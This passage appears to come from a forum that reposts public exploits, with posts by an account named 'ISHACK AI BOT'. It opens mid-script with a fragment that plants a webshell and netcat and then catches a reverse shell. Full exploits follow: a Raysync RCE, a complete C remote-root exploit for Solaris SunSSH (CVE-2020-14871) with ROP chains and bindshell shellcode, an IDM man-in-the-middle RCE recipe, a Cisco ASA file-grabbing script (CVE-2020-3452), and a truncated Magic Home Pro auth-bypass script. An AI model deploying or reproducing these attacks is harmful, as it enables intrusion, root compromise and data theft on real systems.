get_remote_file(url, '.php') netcat = get_remote_file(url, '.exe') persistence(url, webshell, netcat) start_listener(reverse_port) get_reverse(url, reverse_ip, reverse_port)
  11. ISHACK AI BOT

    Raysync 3.3.3.8 - RCE

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Raysync 3.3.3.8 - RCE # Date: 04/10/2020 # Exploit Author: XiaoLong Zhu # Vendor Homepage: www.raysync.io # Version: below 3.3.3.8 # Tested on: Linux step1: run RaysyncServer.sh to build a web application on the local environment, set admin password to 123456 , which will be write to manage.db file. step2: curl "[email protected]" http://[raysync ip]/avatar?account=1&UserId=/../../../../config/manager.db to override remote manage.db file in server. step3: login in admin portal with admin/123456. step4: create a normal file with all permissions in scope. step5: modify RaySyncServer.sh ,add arbitrary evil command. step6: trigger rce with clicking "reset" button
  12. ISHACK AI BOT

    Solaris SunSSH 11.0 x86 - libpam Remote Root

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Solaris SunSSH 11.0 x86 - libpam Remote Root # Exploit Author: Hacker Fantastic # Vendor Homepage: https://www.oracle.com/solaris/technologies/solaris11-overview.html # Version: 11 # Tested on: SunOS solaris 5.11 11.0 /* SunSSH Solaris 10-11.0 x86 libpam remote root exploit CVE-2020-14871 * ==================================================================== * Makefile * all: hfsunsshdx * * hfsunsshdx: main.c * gcc main.c -o hfsunsshdx -lssh2 * * clean: * rm -rf hfsunsshdx * rm -rf core.* * * A trivial to reach stack-based buffer overflow is present in libpam on * Solaris. The vulnerable code exists in pam_framework.c parse_user_name() * which allocates a fixed size buffer of 512 bytes on the stack and parses * usernames into the buffer via modules (authtok_get) without bounds checks. * This issue can be reached remotely pre-authentication via SunSSH when * "keyboard-interactive" is enabled to use PAM based authentication. The * vulnerability was discovered being actively exploited by FireEye in the * wild and is part of an APT toolkit called "EVILSUN". The vulnerability * is present in both SPARC/x86 versions of Solaris & others (eg. illumos). * This exploit uses ROP gadgets to disable nxstack through mprotect on x86 * and a helper shellcode stub. The configuration in a default Solaris * install is vulnerable. The exploit makes use of libssh2 and tested on * Solaris 10 through 11.0. Solaris 9 does not ship with a vulnerable * SunSSH implementation and versions later than 11.1 have updated SunSSH * code that prevents the issue being triggered. * * e.g. * ./hfsunsshdx -s 192.168.11.220 -t 0 -x 2 * [+] SunSSH Solaris 10-11.0 x86 libpam remote root exploit CVE-2020-14871 * [-] chosen target 'Solaris 11 11/11 11.0 Sun_SSH_2.0 x86' * [-] using shellcode 'Solaris 11.0 x86 bindshell tcp port 9999' 193 bytes * [+] ssh host fingerprint: 01bc34fe8092e051716b91fd88eed210db2df49e * [+] entering keyboard-interactive authentication. * [-] number of prompts: 1 * [-] prompt 0 from server: 'Please enter user name: ' * [-] shellcode length 193 bytes * [-] rop chain length 68 * [-] exploit buffer length 580 * [-] sending exploit magic buffer... wait * [+] exploit success, handling payload... * [-] connected.. enjoy :) * SunOS solaris 5.11 11.0 i86pc i386 i86pc * 6:49pm up 53 min(s), 1 user, load average: 0.01, 0.01, 0.01 * helpdesk console Nov 27 17:57 * uid=0(root) gid=0(root) * * -- Hacker Fantastic (https://hacker.house) */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <fcntl.h> #include <errno.h> #include <ctype.h> #include <getopt.h> #include <time.h> #include <signal.h> #include <string.h> #include <sys/socket.h> #include <netinet/in.h> #include <sys/select.h> #include <arpa/inet.h> #include <sys/time.h> #include <libssh2.h> int sd = -1; int oldsd = -1; int ishell = -1; char* buf; char* payload; char* retaddr; struct sockaddr_in sain; struct target { char* name; char* ropchain; }; struct shellcode { char* name; char* shellcode; }; void spawn_shell(int); void bindshell_setup(short); void on_alarm(int); void on_interupt(int); void prepare_payload(); const int targetno = 5; struct target targets[] = { {"Solaris 11 11/11 11.0 Sun_SSH_2.0 x86", "\x41\x42\x43\x44" // %ebx "\x45\x46\x47\x48" // %esi "\x50\x51\x52\x53" // %ebp "\xa7\x0e\x06\x08" // pop %ecx, pop %edx, pop %ebp "\x9c\x3e\x04\x08" // ptr to (0x?, 0x?, 0x8044cf0, 0x7) "\x01\x01\x04\x08" // %edx unused, must be writeable addr "\x41\x42\x43\x44" // %ebp unused var "\x93\xdb\xc8\xfe" // pop %edx ; ret "\x01\x30\x04\x08" // ptr to 0x08043001 mprotect arg "\x1a\xe7\x0b\xfe" // dec %edx ; ret "\x79\x41\xfe\xfe" // mov %edx,$0x4(%ecx) ; xor %eax, %eax ; ret "\x93\xdb\xc8\xfe" // pop %edx ; ret "\x01\x30\x04\x08" // ptr to shellcode "\xe0\xe8\x3e\xfe" // mov $0x72,%al "\x64\x7c\xc3\xfe" // inc %eax ; ret "\x64\x7c\xc3\xfe" // inc %eax ; ret "\x22\x9d\xd3\xfe"},// sysenter {"Solaris 11 Express (snv_151a) Sun_SSH_1.5 x86", "\x41\x42\x43\x44" // %ebx overwrite unused "\x41\x42\x43\x44" // %esi overwrite unused "\xf8\x32\x04\x08" // %ebp overwrite unused "\xb7\xf9\x05\x08" // pop %ecx ; pop %edx ; pop %ebp ; ret "\x7e\x36\x02\x04" // ptr/2 to (0x?, 0x0, 0x1000, 0x7) "\x01\x30\x04\x08" // ptr for %edx "\x44\x43\x42\x41" // ptr for %ebp unused "\xe4\xd4\xde\xfe" // dec %edx ; add %ecx, %ecx ; ret "\x19\x42\xfe\xfe" // mov %edx,$0x4(%ecx) ; xor %eax, %eax; ret "\xb8\xf9\x05\x08" // pop %edx ; pop %ebp ; ret "\xeb\x30\x04\x08" // shellcode ptr for %edx "\x1c\x33\x04\x08" // %ebp & used by "leave" "\x84\x98\x51\xfe" // mov $0x82, %eax ; pop %esi ; pop %ebx ; leave ; ret "\x41\x42\x43\x44" // %esi unused "\xe0\x30\x04\x08" // shellcode ptr to %ebx "\xe8\x32\x04\x08" // ptr into %ebp "\x19\x3f\xfe\xfe" // sub $0x4,%eax ; ret "\x19\x3f\xfe\xfe" // sub $0x4,%eax ; ret "\x19\x3f\xfe\xfe" // sub $0x4,%eax ; ret "\x11\x3f\xfe\xfe" // sub $0x2,%eax ; ret "\xfe\xf8\xcf\xfe"},// sysenter {"Solaris 10 1/13 (147148-26) Sun_SSH_1.1.5 x86", "\xc3\x31\x04\x08" // overwrite %ebp unused "\xa3\x6c\xd8\xfe" // mov $0x74, %eax ; ret "\x29\x28\x07\x08" // pop %ebx ; ret "\xf0\xff\xaf\xfe" // 0x0a writen to address, unused gadget "\x08\xba\x05\x08" // pop %edx ; pop %ebp ; ret "\x01\x30\x04\x08" // %edx pointer to page "\xb8\x31\x04\x08" // unused %ebp value "\xaa\x4c\x68\xfe" // pop %ecx ; ret "\xe0\x6e\x04\x08" // ptr (0x?,0x0,0x1000,0x7) "\x61\x22\x07\x08" // dec %edx ; ret "\x8b\x2d\xfe\xfe" // mov %edx,0x4(%ecx) ; xor %eax,%eax ; ret "\xa3\x6c\xd8\xfe" // mov $0x74, %eax ; ret "\x08\xba\x05\x08" // pop %edx ; pop %ebp ; ret "\xc3\x31\x04\x08" // shellcode addr for %edx "\xc3\x31\x04\x08" // unused %ebp value "\xf6\x0d\xf4\xfe"},// sysenter, (ret into shellcode via %edx) {"Solaris 10 8/11 (147441-01) Sun_SSH_1.1.4 x86", "\xc3\x31\x04\x08" // overwrite %ebp unused "\x73\x6a\xd7\xfe" // mov $0x74, %eax ; ret "\xb1\x26\x07\x08" // pop %ebx ; ret "\xff\x01\xac\xfe" // write garbage here, unused gadget "\x98\xb9\x05\x08" // pop %edx ; pop %ebp ; ret "\xff\x2f\x04\x08" // %edx pointer to page "\xc3\x31\x04\x08" // unused %ebp value "\x57\xaa\xe4\xfe" // pop %ecx ; ret "\x94\x11\x5f\xfe" // ptr rwx (0x?,0x04b,0xe50,0x7) "\xee\x6a\x65\xfe" // inc %edx ; ret "\x9b\xc5\xc1\xfe" // mov %edx,0x4($ecx) ; xor %eax,%eax ; ret "\x73\x6a\xd7\xfe" // mov $0x74, %eax ; ret "\x86\xae\xe5\xfe" // pop %edx ; ret "\xc3\x31\x04\x08" // shellcode return address for %edx "\x66\x56\xb9\xfe"},// sysenter (ret into shellcode via %edx) {"Solaris all Sun_SSH_1.x.x debug crash target", "\x41\x42\x43\x43" // %ebp ptr "\x78\x79\x80\x81"} // %eip ptr }; const int shellno = 4; struct shellcode shellcodes[] = { {"Solaris x86 bindshell tcp port 9999", /* mprotect magic stub necessary for payloads expecting +x stack */ "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x31\xc9" "\xbb\x01\x10\x04\x08\x66\xb8\x01\x70\xb1\x07\x4b\x48\x51\x50" "\x53\x53\x89\xe1\x31\xc0\xb0\x74\xcd\x91" /* mprotect_shellcode.S Solaris x86 mprotect(0x08044000,0x7000,0x07); ================================================================== xorl %eax, %eax xorl %ecx, %ecx movl $0x08041001, %ebx movw $0x7001, %ax movb $0x7,%cl dec %ebx dec %eax pushl %ecx pushl %eax pushl %ebx pushl %ebx movl %esp, %ecx xorl %eax, %eax movb $0x74, %al int $0x91 */ /* msfvenom -p solaris/x86/shell_bind_tcp -b "\x09\x20" LPORT=9999 -f c -e x86/xor_dynamic */ "\xeb\x23\x5b\x89\xdf\xb0\x55\xfc\xae\x75\xfd\x89\xf9\x89\xde" "\x8a\x06\x30\x07\x47\x66\x81\x3f\x2a\x95\x74\x08\x46\x80\x3e" "\x55\x75\xee\xeb\xea\xff\xe1\xe8\xd8\xff\xff\xff\x01\x55\x69" "\xfe\xd9\xfe\x3d\x6b\x64\x88\xe7\xf6\x57\x05\xf7\x17\x30\xc1" "\x51\x69\xfe\x03\x26\x0e\x88\xe6\x6b\x03\x51\x51\x6b\x03\x6b" "\x03\xb1\xe7\xfe\xd7\x6b\x11\x56\x51\x30\xc1\xb1\xe9\xfe\xd7" "\x5a\x51\x51\x52\xb1\xe8\xfe\xd7\xb1\xeb\xfe\xd7\x6b\x08\x51" "\x6b\x3f\x59\xfe\xd7\xfe\x4e\xd9\x78\xf7\x51\x69\x2e\x2e\x72" "\x69\x69\x2e\x63\x68\x6f\x88\xe2\x51\x52\x88\xe0\x51\x50\x52" "\xb1\x3a\xfe\xd7\x2a\x95"}, {"Solaris x86 bindshell tcp port 8080", /* mprotect magic stub necessary for payloads expecting +x stack */ "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x31\xc0\x31\xc9" "\xbb\x01\x10\x04\x08\x66\xb8\x01\x70\xb1\x07\x4b\x48\x51\x50" "\x53\x53\x89\xe1\x31\xc0\xb0\x74\xcd\x91" /* msfvenom -p solaris/x86/shell_bind_tcp -b "\x09\x20" LPORT=8080 -f c -e x86/xor_dynamic */ "\xeb\x23\x5b\x89\xdf\xb0\x9a\xfc\xae\x75\xfd\x89\xf9\x89\xde" "\x8a\x06\x30\x07\x47\x66\x81\x3f\x44\x60\x74\x08\x46\x80\x3e" "\x9a\x75\xee\xeb\xea\xff\xe1\xe8\xd8\xff\xff\xff\x01\x9a\x69" "\xfe\xd9\xfe\x3d\x6b\x64\x88\xe7\xf6\x57\x05\xf7\x17\x30\xc1" "\x51\x69\xfe\x03\x1e\x91\x88\xe6\x6b\x03\x51\x51\x6b\x03\x6b" "\x03\xb1\xe7\xfe\xd7\x6b\x11\x56\x51\x30\xc1\xb1\xe9\xfe\xd7" "\x5a\x51\x51\x52\xb1\xe8\xfe\xd7\xb1\xeb\xfe\xd7\x6b\x08\x51" "\x6b\x3f\x59\xfe\xd7\xfe\x4e\xd9\x78\xf7\x51\x69\x2e\x2e\x72" "\x69\x69\x2e\x63\x68\x6f\x88\xe2\x51\x52\x88\xe0\x51\x50\x52" "\xb1\x3a\xfe\xd7\x44\x60"}, /* dup2(); and execve(); changed calling convention on 11.0, uses x86/shikata_ga_nai */ {"Solaris 11.0 x86 bindshell tcp port 9999", "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x31\xc0\x31\xc9\x31\xd2\xbb\x01\x10\x04\x08\x66\xb8\x01\x70" "\xb1\x07\x66\xba\x01\x10\x66\x31\xd3\x48\x51\x50\x53\x53\x89" "\xe1\x31\xc0\xb0\x74\xcd\x91"//not encoded, stack address different "\xb8\x5d\x6d\x26\x15\xda\xce\xd9\x74\x24\xf4\x5a\x2b\xc9\xb1" "\x19\x31\x42\x15\x83\xea\xfc\x03\x42\x11\xe2\xa8\x05\xd9\xcd" "\xad\xea\x4f\x8b\xd8\xf5\x67\x05\xde\x0f\x91\x9b\x1e\xbf\xf6" "\x24\x9c\x67\x08\x52\x47\x0d\x14\x34\xd7\xb8\x1a\xde\xd5\x8c" "\xfd\xe1\x0f\x86\x11\x49\xff\x66\xd2\xc5\x17\x77\x04\x7e\xb7" "\xdb\x19\x68\xc8\x0a\xe9\x81\xc9\x65\x60\x5f\x5f\x83\x25\x35" "\xa1\xcb\x3a\x1f\x22\xa4\x1c\xd9\x2a\x0a\x5d\x4a\xba\x42\x72" "\x18\x52\xf5\xa3\xbc\xcb\x6b\x35\xa3\x5b\x27\xcc\xc5\x0b\x97" "\x9f\x56\x1b\x2c\xdf\x8f"}, /* dup2(); and execve(); changed calling convention on 11.0, uses x86/shikata_ga_nai */ {"Solaris 11.0 x86 bindshell tcp port 4444", "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90" "\x31\xc0\x31\xc9\x31\xd2\xbb\x01\x10\x04\x08\x66\xb8\x01\x70" "\xb1\x07\x66\xba\x01\x10\x66\x31\xd3\x48\x51\x50\x53\x53\x89" "\xe1\x31\xc0\xb0\x74\xcd\x91"//not encoded, stack address different "\xb8\x8d\x2e\x32\x79\xd9\xe5\xd9\x74\x24\xf4\x5b\x29\xc9\xb1" "\x19\x31\x43\x15\x03\x43\x15\x83\xc3\x04\xe2\x78\x46\xcd\xa1" "\x7d\xab\x5b\x37\x08\x32\x6c\xe1\x0e\x4d\x85\x3f\xce\xe1\xc2" "\xc0\xcc\x1e\x83\xb6\x37\x4a\xa1\x98\xe7\xe1\xa7\x72\x05\x46" "\x41\x7d\xdf\xcc\x9e\xd5\x8f\x21\x5f\x69\xc7\xbd\x89\xd1\x47" "\x11\x86\x0f\x98\x43\x56\x25\x99\xba\xfd\xb3\x0f\x4a\x52\xae" "\xf1\x14\xad\xf8\xf2\xea\x89\x7c\xfa\xc4\xe9\x2f\x6a\x08\xc5" "\xbc\x02\x3e\x36\x21\xbb\xd0\xc1\x46\x6b\x7e\x5b\x69\xdb\xd0" "\x0a\x39\x6b\xeb\x53\x6b"} }; void spawn_shell(int sd) { #define sockbuflen 2048 int rcv; char sockbuf[sockbuflen]; fd_set readfds; memset(sockbuf,0,sockbuflen); snprintf(sockbuf,sockbuflen,"uname -a;uptime;who;id\n"); write(sd,sockbuf,strlen(sockbuf)); while (1) { FD_ZERO(&readfds); FD_SET(0,&readfds); FD_SET(sd,&readfds); select(255,&readfds,NULL,NULL,NULL); if (FD_ISSET(sd, &readfds)) { memset(sockbuf,0,sockbuflen); rcv = read(sd,sockbuf,sockbuflen); if (rcv <= 0) { printf("\e[1m\e[34m[!] connection closed by foreign host.\n\e[0m"); exit(-1); } printf("%s",sockbuf); fflush(stdout); } if(FD_ISSET(0,&readfds)) { memset(sockbuf,0,sockbuflen); read(0,sockbuf,sockbuflen); write(sd,sockbuf,strlen(sockbuf)); } } } void bindshell_setup(short port){ oldsd = sd; sd = socket(AF_INET,SOCK_STREAM,0); sain.sin_port = htons(port); if(connect(sd,(struct sockaddr*)&sain,sizeof(sain))<0){ printf("[!] fatal bind shell failed\n\e[0m"); exit(-1); } printf("[-] connected.. enjoy :)\e[0m\n"); spawn_shell(sd); } void on_alarm(int signum){ printf("[+] exploit success, handling payload...\n"); if(ishell==0||ishell==2){ bindshell_setup(9999); } if(ishell==1||ishell==3){ bindshell_setup(8080); } printf("[-] exploit complete\n\e[0m"); exit(0); } void on_interrupt(int signum){ printf("\e[1m\e[34m[!] interrupt caught... cleaning up\n\e[0m"); if(sd){ close(sd); } if(oldsd){ close(oldsd); } exit(0); } void prepare_payload(){ /* bad characters are 0x20 0x09 & 0x00 */ #define payload_size 4096 int len = strlen(payload); buf = malloc(payload_size); char randchar = 'A'; char* randbuf = malloc(2); if(!buf||!randbuf){ printf("[!] fatal payload buffer error\n"); exit(-1); } srand(time(NULL)); memset(buf,'\x00',payload_size); memset(randbuf,0,2); printf("[-] shellcode length %d bytes\n",len); if(len < 512 && payload_size > 1024){ memcpy(buf,payload,len); for(int i =0;i <= (512 - len);i++){ randchar = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"[random() % 52]; memcpy(randbuf,&randchar,1); strcat(buf,randbuf); } len = strlen(retaddr); printf("[-] rop chain length %d\n",len); if(len + 512 < payload_size){ memcpy((void*)(long)buf+512,(void*)retaddr,len); len = strlen(buf); printf("[-] exploit buffer length %d\n",len); } else{ printf("[!] exploit buffer miscalculated\n"); exit(-1); } } else{ printf("[!] exploit buffer miscalculated\n"); exit(-1); } } static void kbd_callback(const char *name, int name_len,const char *instruction, int instruction_len,int num_prompts,const LIBSSH2_USERAUTH_KBDINT_PROMPT *prompts,LIBSSH2_USERAUTH_KBDINT_RESPONSE *responses, void **abstract) { int i = 0; signal(SIGALRM, &on_alarm); printf("[+] entering keyboard-interactive authentication.\n"); printf("[-] number of prompts: %d\n", num_prompts); printf("[-] prompt %d from server: '", i); fwrite(prompts[i].text, 1, prompts[i].length, stdout); printf("'\n"); prepare_payload(); //uncomment to pause for gdb debugging //sleep(10); responses[i].text = strdup(buf); responses[i].length = strlen(buf); printf("[-] sending exploit magic buffer... wait\n"); alarm(5); } int main(int argc,char **argv){ int ihost = 0, itarg = 0, port = 22, index = 0, rc = 0; char* host; int i, type, exitcode; unsigned long hostaddr; const char *fingerprint; LIBSSH2_SESSION *session; LIBSSH2_CHANNEL *channel; char *exitsignal = (char *)"none"; size_t len; LIBSSH2_KNOWNHOSTS *nh; static struct option options[] = { {"server", 1, 0, 's'}, {"port", 1, 0, 'p'}, {"target", 1, 0, 't'}, {"shellcode", 1, 0, 'x'}, {"help", 0, 0,'h'} }; printf("\e[1m\e[34m[+] SunSSH Solaris 10-11.0 x86 libpam remote root exploit CVE-2020-14871\n"); while(rc != -1) { rc = getopt_long(argc,argv,"s:p:t:x:h",options,&index); switch(rc) { case -1: break; case 's': if(ihost==0){ host = malloc(strlen(optarg) + 1); if(host){ sprintf(host,"%s",optarg); ihost = 1; } } break; case 'p': port = atoi(optarg); break; case 'x': if(ishell==-1) { rc = atoi(optarg); switch(rc){ case 0: printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode)); payload = malloc(strlen(shellcodes[rc].shellcode)+1); if(payload){ memset(payload,0,strlen(shellcodes[rc].shellcode)+1); memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode)); ishell = rc; } break; case 1: printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode)); payload = malloc(strlen(shellcodes[rc].shellcode)+1); if(payload){ memset(payload,0,strlen(shellcodes[rc].shellcode)+1); memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode)); ishell = rc; } break; case 2: printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode)); payload = malloc(strlen(shellcodes[rc].shellcode)+1); if(payload){ memset(payload,0,strlen(shellcodes[rc].shellcode)+1); memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode)); ishell = rc; } break; case 3: printf("[-] using shellcode '%s' %d bytes\n",shellcodes[rc].name,strlen(shellcodes[rc].shellcode)); payload = malloc(strlen(shellcodes[rc].shellcode)+1); if(payload){ memset(payload,0,strlen(shellcodes[rc].shellcode)+1); memcpy((void*)payload,(void*)shellcodes[rc].shellcode,strlen(shellcodes[rc].shellcode)); ishell = rc; } break; default: printf("[!] Invalid shellcode selection %d\n",rc); exit(0); break; } } break; case 't': if(itarg==0){ rc = atoi(optarg); switch(rc){ case 0: printf("[-] chosen target '%s'\n",targets[rc].name); retaddr = malloc(strlen(targets[rc].ropchain)+1); if(retaddr){ memset(retaddr,0,strlen(targets[rc].ropchain)+1); memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain)); itarg = rc; } break; case 1: printf("[-] chosen target '%s'\n",targets[rc].name); retaddr = malloc(strlen(targets[rc].ropchain)+1); if(retaddr){ memset(retaddr,0,strlen(targets[rc].ropchain)+1); memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain)); itarg = rc; } break; case 2: printf("[-] chosen target '%s'\n",targets[rc].name); retaddr = malloc(strlen(targets[rc].ropchain)+1); if(retaddr){ memset(retaddr,0,strlen(targets[rc].ropchain)+1); memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain)); itarg = rc; } break; case 3: printf("[-] chosen target '%s'\n",targets[rc].name); retaddr = malloc(strlen(targets[rc].ropchain)+1); if(retaddr){ memset(retaddr,0,strlen(targets[rc].ropchain)+1); memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain)); itarg = rc; } break; case 4: printf("[-] chosen target '%s'\n",targets[rc].name); retaddr = malloc(strlen(targets[rc].ropchain)+1); if(retaddr){ memset(retaddr,0,strlen(targets[rc].ropchain)+1); memcpy((void*)retaddr,(void*)targets[rc].ropchain,strlen(targets[rc].ropchain)); itarg = rc; } break; default: printf("[!] Invalid target selection %d\n", rc); exit(0); break; } itarg = 1; } break; case 'h': printf("[!] Usage instructions.\n[\n"); printf("[ %s <required> (optional)\n[\n[ --server|-s <ip/hostname>\n",argv[0]); printf("[ --port|-p (port)[default 22]\n[ --target|-t <target#>\n"); printf("[ --shellcode|-x <shellcode#>\n[\n"); printf("[ Target#'s\n"); for(i = 0;i <= targetno - 1;i++){ printf("[ %d \"%s\"\n",i,targets[i]); } printf("[\n[ Shellcode#'s\n"); for(i = 0;i <= shellno - 1;i++){ printf("[ %d \"%s\" (length %d bytes)\n",i,shellcodes[i].name,strlen(shellcodes[i].shellcode)); } printf("\e[0m"); exit(0); break; default: break; } } if(itarg != 1 || ihost != 1 || ishell < 0){ printf("[!] error, insufficient arguments, try running '%s --help'\e[0m\n",argv[0]); exit(-1); } rc = libssh2_init(0); hostaddr = inet_addr(host); sd = socket(AF_INET, SOCK_STREAM, 0); sain.sin_family = AF_INET; sain.sin_port = htons(port); sain.sin_addr.s_addr = hostaddr; if(connect(sd, (struct sockaddr*)(&sain),sizeof(struct sockaddr_in)) != 0) { fprintf(stderr, "[!] failed to connect!\n"); goto shutdown; } session = libssh2_session_init(); libssh2_session_set_blocking(session, 1); while((rc = libssh2_session_handshake(session, sd))==LIBSSH2_ERROR_EAGAIN); if(rc) { printf("[!] failure establishing ssh session: %d\n", rc); goto shutdown; } nh = libssh2_knownhost_init(session); if(!nh) { printf("[!] failure on libssh2 init\n"); goto shutdown; } fingerprint = libssh2_hostkey_hash(session, LIBSSH2_HOSTKEY_HASH_SHA1); printf("[+] ssh host fingerprint: "); for(i = 0; i < 20; i++) { printf("%02x", (unsigned char)fingerprint[i]); } printf("\n"); libssh2_knownhost_free(nh); signal(SIGINT,&on_interrupt); libssh2_userauth_keyboard_interactive(session, "", &kbd_callback); printf("[!] exploit failed, core maybe on target!\n"); shutdown: if(sd){ close(sd); } printf("\e[0m"); return -2; }
  13. ISHACK AI BOT

    Internet Download Manager v6.41 Build 3 - Remote Code Execution (RCE)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Internet Download Manager v6.41 Build 3 - Remote Code Execution (RCE) # Date: 15.11.2022 # Exploit Author: M. Akil Gündoğan # Contact: https://twitter.com/akilgundogan # Vendor Homepage: https://www.internetdownloadmanager.com/ # Software Link: https://mirror2.internetdownloadmanager.com/idman641build3.exe?v=lt&filename=idman641build3.exe # Version: v.6.41 Build 3 # Tested on: Windows 10 Professional x64 # PoC Video: https://youtu.be/0djlanUbfY4 Vulnerabiliy Description: --------------------------------------- Some help files are missing in non-English versions of Internet Download Manager. Help files with the extension ".chm" prepared in the language used are downloaded from the internet and run, and displayed to users. This download is done over HTTP, which is an insecure protocol. An attacker on the local network can spoof traffic with a MITM attack and replaces ".chm" help files with malicious ".chm" files. IDM runs ".chm" files automatically after downloading. This allows the attacker to execute code remotely. It also uses HTTP for checking and downloading updates by IDM. The attacker can send fake updates as if the victim has a new update to the system. Since we preferred to use Turkish IDM, our target address in the MITM attack was "http://www.internetdownloadmanager.com/languages/tut_tr.chm". Requirements: --------------------------------------- The attacker and the victim must be on the same local network. The victim using the computer must have a user account with administrative privileges on the system. The attacker does not need to have administrator privileges! Step by step produce: --------------------------------------- 1 - The attacker prepares a malicious CHM file. You can read the article at "https://sevenlayers.com/index.php/316-malicious-chm" for that. 2 - A MITM attack is made against the target using Ettercap or Bettercap. 3 - Let's redirect the domains "internetdownloadmanager.com" and "*.internetdownloadmanager.com" to our attacker machine with DNS spoofing. 4 - A web server is run on the attacking machine and the languages directory is created and the malicious ".chm" file with the same name (tut_tr.chm / the file according to which language you are using.) is placed in it. 5 - When the victim opens Internet Download Manager and clicks on the "Tutorials" button, the download will start and our malicious ".chm" file will run automatically when it's finished. Advisories: --------------------------------------- Developers should stop using insecure HTTP in their update and download modules. In addition, every downloaded file should not be run automatically, additional warning messages should be displayed for users. Special thanks: p4rs, ratio, blackcode, zeyd.can and all friends. ---------------------------------------
  14. ISHACK AI BOT

    Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2)

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Cisco ASA 9.14.1.10 and FTD 6.6.0.1 - Path Traversal (2) # Date: 12 Dec 2020 # Exploit Author: [email protected] # Vendor Homepage: cisco.com # Software Link: It’s against Hardware, specifically ASA’s and FTD’s # Version: ASAs (from version 9.6 to 9.14.1.10) and FTD’s (versions 6.2.3 to 6.6.0.1) # Tested on: exploit runs on Python3 on OSX and on Kali Linux against cisco ASA 9.14 # CVE : CVE-2020-3452 # Github : https://github.com/cygenta/CVE-2020-3452 import requests # Written by freakyclown for @CygentaHQ # Cisco ASA Path Traversal # CVE-2020-3452 # Usage: CVE-2020-3452.py {target}" # Example: CVE-2020-3452.py 192.168.0.12" # Requires - Requests - pip3 install requests # # This tool takes advantage of the above cve and attempts to # download files as listed below, it is suggested that you make # a working folder for the outputfiles to avoid confusion if # attacking mutliple ASA's # set your target target = input("Enter target IP/Url: ") def grabstuff(): for file in files: print("trying: ", file) #set request parameters params = ( ('type', 'mst'), ('textdomain', '+CSCOE+/'+file), ('default-language', ''), ('lang', '../'), ) # set the response to the result of the request, inputting in target and params and ignoring ssl cert problems response = requests.get('https://'+target+'/+CSCOT+/translation-table', params=params, verify=False) # write the file to the disk f = open(file,"w") f.write(response.text) f.close() # this is a list of files available to download, more will be added in time # if anyone has a list of ASA files, I'd be happy to add here files = { "sess_update.html", "blank.html", "noportal.html", "portal_ce.html", "portal.html", "logon_custom.css", "svc.html", "logo.gif", "portal_inc.lua", "nostcaccess.html", "session.js", "portal.js", "portal_custom.css", "running.conf", "tlbrportal_forms.js", "logon_forms.js", "win.js", "portal.css", "lced.html", "pluginlib.js", "useralert.html", "ping.html", "app_index.html", "shshimdo_url", "session_password.html", "relayjar.html", "relayocx.html", "color_picker.js", "color_picker.html", "cedhelp.html", "cedmain.html", "cedlogon.html", "cedportal.html", "portal_elements.html", "commonspawn.js", "common.js", "appstart.js", "relaymonjar.html", "relaymonocx.html", "cedsave.html", "tunnel_linux.jnlp", "ask.html", "no_svc.html", "preview.html", "cedf.html", "ced.html", "logon_redirect.html", "logout.html", "tunnel_mac.jnlp", "gp-gip.html", "auth.html", "wrong_url.html", "logon.html"} # obvious thing is obvious, try the things and barf if fail try: grabstuff() except Exception as err: print("Something went wrong sorry") print(err)
  15. ISHACK AI BOT

    Magic Home Pro 1.5.1 - Authentication Bypass

    ISHACK AI BOT发布主题帖子在 ?day POC 漏洞数据库
    # Exploit Title: Magic Home Pro 1.5.1 - Authentication Bypass # Google Dork: NA # Date: 22 October 2020 # Exploit Author: Victor Hanna (Trustwave SpiderLabs) # Author Github Page: https://9lyph.github.io/CVE-2020-27199/ # Vendor Homepage: http://www.zengge.com/appkzd # Software Link: https://play.google.com/store/apps/details?id=com.zengge.wifi&hl=en # Version: 1.5.1 (REQUIRED) # Tested on: Android 10 ## Enumeration ## import requests import json import os from colorama import init from colorama import Fore, Back, Style import re ''' 1. First Stage Authentication 2. Second Stage Enumerate 3. Third Stage Remote Execute ''' global found_macaddresses found_macaddresses = [] global outtahere outtahere = "" q = "q" global token def turnOn(target, token): urlOn = "https://wifij01us.magichue.net/app/sendCommandBatch/ZG001" array = { "dataCommandItems":[ {"hexData":"71230fa3","macAddress":target} ] } data = json.dumps(array) headersOn = { "User-Agent":"Magic Home/1.5.1(ANDROID,9,en-US)", "Accept-Language": "en-US", "Accept": "application/json", "Content-Type": "application/json; charset=utf-8", "token":token, "Host": "wifij01us.magichue.net", "Connection": "close", "Accept-Encoding": "gzip, deflate" } print (Fore.WHITE + "[+] Sending Payload ...") response = requests.post(urlOn, data=data, 